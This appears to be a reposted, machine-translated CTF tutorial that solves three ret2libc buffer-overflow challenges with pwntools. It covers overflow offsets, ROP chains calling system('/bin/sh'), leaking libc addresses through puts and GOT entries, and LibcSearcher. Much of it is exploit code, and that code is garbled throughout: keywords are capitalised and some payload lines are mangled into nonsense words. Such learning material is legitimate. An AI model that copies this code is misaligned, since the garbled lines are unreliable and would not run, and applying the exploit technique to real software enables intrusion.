Shulou(Shulou.com)06/01 Report--

Video of this article:

If the text is too boring, watch the online video: https://edu.51cto.com/sd/16514

Basics:

Question 1: ret2libc1

Let's analyze it with IDA first.

There is a gets function that will have an overflow vulnerability. We are looking at the protection of the next program.

You can see that NX is enabled, which means that our data in the stack does not have execution permission. We need to use ROP to bypass.

We used the pattern of gdb to test that the overflow offset was 112

The commands are: pattern create 200

Execute the r command

Enter the generated string

Follow the prompts to pattern offset xxxxxx

What we need to do next is to execute the system function system ("/ bin/sh") to obtain the permissions of the system.

So we can imagine that our payload is:'a'* 112 + system_plt + 0x0000000 + bin_sh_addr

We need the plt address of system and the address of the string / bin/sh

The plt address of system can be viewed with IDA, and ALT + T is used to search for system in the page.

/ how to obtain bin/sh:

So we get our exp as:

From pwn import *

P = process ('. / ret2libc1')

System_plt_addr = 0x08048460

Bin_sh_addr = 0x08048720

Payload = flat (['a'* 112, system_plt_addr, 0x00000000, bin_sh_addr])

P.sendline (payload)

P.interactive ()

Second question

This question is not much different from the first one, except that the address of the string / bin/sh can not be found. So we need to restructure.

In addition to looking up the address of / bin/sh in the program, we can also ask the user to enter it directly. So we can construct the following payload

Payload ='a' + get_plt + pop_ebx + bin_sh + system_plt + 0x00000000 + bin_sh

It doesn't matter whether pop_ebx or pop eax in payload, but when we use ROPgadget, we can only find pop ebx;ret.

Next, we dynamically debug the code execution process and stack changes after payload is sent to ret2libc2. Let's take a look at the exp code

From pwn import *

P = process ('. / ret2libc2')

System_plt = 0x08048490

Gets_plt = 0x08048460

Buf = 0x0804a0e4-16

Pop_ebx_addr = 0x0804843d

Payload = flat (['a'* 112 recorder getsbook pltpl poppy ebxreb addr bufbook systematile pltmeme 0x000000je Buf])

Pause ()

P.sendline (payload)

P.interactive ()

It can also be an exp:

From pwn import *

P = process (". / ret2libc2")

Elf = ELF (". / ret2libc2")

Rop = ROP (elf)

Gets_plt = elf.plt ['gets']

System_plt = elf.plt ['system']

# automatically find rop without requiring us to use ROPgadget to search

Pop_ret = rop.search (8) .address

# pop_ret = 0x0804843d

# elf.bss () represents the start position of the bss segment (this position will be larger than the actual bss start position)

Buf = elf.bss (0xf)

# buf = 0x0804b000-16

Payload = flat (['axiaqiao 112 recorder getsbook pltgraghy poppy retro bufrecract systemplaypltmeme 0x0000000pf])

P.sendline (payload)

P.sendline ('/ bin/sh\ n')

P.interactive ()

The value of the buf variable is the content of the bss section. Using vmmap, we can see the bss with w permission, and save our gets input at the end of-16.

You can also use display & buf2 to find the address of a variable

Run exp.py and use gdb attach to debug after getting pid

Finish all the way to the main function

We find that after executing the ret of the main method, the program enters the gets function, indicating that our payload has been executed successfully.

Question 3:

Use IDA to view the code

Found that there is a gets function, there are vulnerabilities, the use of GDB loader: gdb. / ret2libc3

After entering the gdb command line, use checksec to view protection

We found that it was protected by NX and we used ROP to bypass it.

We can construct payload ='a'* offset + system_plt+0x00000000 + bin_sh_addr

The key is how to get the address of system and / bin/sh, so we use objdump to look at the system plt address

Found that there is no system in plt, use ROPgadget to find the address of / bin/sh

We found no / bin/sh, so we had to calculate the values of these two on our own.

So how do we get the address of the system function? Here we mainly make use of two knowledge points.

The system function belongs to libc, while the relative offset between functions in the libc.so dynamic link library is fixed.

Even if the program is protected by ASLR, it is only random for the middle bits of the address, and the lowest 12 bits will not change. While libc has a collection on github, as follows

Https://github.com/niklasb/libc-database

So the first thing we need to do is to determine which libc the ret2libc3 program depends on, as follows:

1. Reveal the location of a ret2libc3 function

2. Get the version of libc

3. Obtain the location of shell and sh according to offset

4. Execute the program to obtain shell

Here we use a lic tool, https://github.com/lieanu/LibcSearcher.

He can help us find the address of system and / bin/sh quickly, but he needs one key thing: the address of a program function.

We know that the delayed binding mechanism is used in Linux programs, which means that you don't know what the real address of a function is until it is executed. What we can see in this program are printf function and gets function. We use these two functions to determine the version of libc. The code is as follows:

From pwn import *

Import time

P = process (". / ret2libc3")

Elf = ELF (". / ret2libc3")

Offset = 112

# address of the function to be leaked

Target_func = 'gets'

# call puts function to print

Puts_func = 'puts'

Puts_plt = elf.plt [puts _ func]

Target_got = elf.gott [target _ func]

Main_addr = elf.symbols ['main']

# call the puts function, print the got address of the leaking function, and finally return the main function. In a 32-bit program, the first argument to the function address is the return address, followed by the parameter.

Payload = offset * 'a' + p32 (puts_plt) + p32 (main_addr) + p32 (target_got)

# payload = flat ([offset * 'axiomagint putspaperpltrect mainframe addrpdptsgot])

P.sendlineafter ("Can you find it!?", payload)

Print hex (U32 (p.recv () [0:4]))

Let's take a look at the results: it is true that the last 12 places are unchanged, 3e0. (4 bytes of a character, 3 * 4 = 12)

Let's check the version: https://libc.blukat.me

There are many versions. Let's switch to another function, use the puts function, directly change the variable target_func to puts, and view the running result:

The last 12 are found to be ca0.

After comparison, the address of the two versions is the same, so you can use that one.

Finally, exp

#! / usr/bin/env python

#-*-coding: UTF-8-*-

From pwn import *

From LibcSearcher import LibcSearcher

Sh = process ('. / ret2libc3')

Ret2libc3 = ELF ('. / ret2libc3')

Rop = ROP (ret2libc3)

Func = 'puts'

Puts_plt = ret2libc3.plt ['puts']

Libc_start_main_got = ret2libc3.got [func]

Main = ret2libc3.symbols ['main'] # get the address of the main function

Print "leak libc_start_main_got addr and return to main again"

Payload = flat (['A' * 112, puts_plt, main, libc_start_main_got])

Sh.sendlineafter ('Can you find it!?', payload)

Print "get the related addr"

# get the address of the puts function when it runs

Libc_start_main_addr = U32 (sh.recv () [0:4])

Print libc_start_main_addr

# instantiating LibcSearcher object

Libc = LibcSearcher (func, libc_start_main_addr)

# calculate the initial address of libc (dynamic address of puts-offset address of puts)

Libcbase = libc_start_main_addr-libc.dump (func)

# calculate the system address

System_addr = libcbase + libc.dump ('system')

# calculate / bin/sh address

Binsh_addr = libcbase + libc.dump ('str_bin_sh')

Print "get shell"

Payload = flat (['A' * 104, system_addr, 0xdeadbeef, binsh_addr])

Sh.sendline (payload)

Sh.interactive ()

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.